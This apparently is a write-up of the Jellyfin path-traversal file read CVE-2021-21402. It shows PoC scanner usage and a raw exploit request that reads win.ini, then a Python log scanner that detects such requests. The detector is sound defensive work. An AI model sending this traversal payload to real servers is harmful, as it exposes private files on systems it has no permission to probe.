Jellyfin arbitrary file read vulnerability (CVE-2021-21402)

    Affected versions

    Jellyfin < 10.7.1  

    POC

    # Test a single URL
    python3 CVE-2021-21402.py -u http://127.0.0.1:1111
    
    # Batch check
    python3 CVE-2021-21402.py -f url.txt

    EXP

    GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
    Host: xxx.xxx.xxx.xxx
    Content-Type: application/octet-stream
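
For defenders, the request shape above can be searched for in web server or reverse proxy access logs. The following is an added example, not part of the original PoC or the Jellyfin project; it assumes a combined-format access log, and the sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line in a combined-format access log: "METHOD path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# Route shape taken from the request on this page: /Audio/<id>/hls/<segment>/stream.mp3
HLS_RE = re.compile(r'^/Audio/[^/]+/hls/(.+)/stream\.mp3/?$', re.IGNORECASE)
# A ".." path component delimited by "/" or "\" (or by the string boundaries)
DOTDOT_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%255C) is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_request(path):
    """True when the hls segment of an /Audio/.../stream.mp3 request holds '..' components."""
    path = path.split("?", 1)[0]  # ignore any query string
    match = HLS_RE.match(fully_decode(path))
    return bool(match and DOTDOT_RE.search(match.group(1)))


def scan(lines):
    """Return (line_number, raw_path) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if request and is_traversal_request(request.group(1)):
            hits.append((number, request.group(1)))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2021:10:00:00 +0000] "GET /Audio/ab12/hls/segment0/stream.mp3 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Apr/2021:10:00:05 +0000] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 200 92',
    '198.51.100.7 - - [01/Apr/2021:10:00:06 +0000] "GET /Audio/1/hls/..%255C..%255Cdata%255Cfile/stream.mp3/ HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Apr/2021:10:00:09 +0000] "GET /web/index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: {path}")
```

A hit with a 200 status and a small response body is worth triaging first, since it suggests the server returned file content rather than an audio segment.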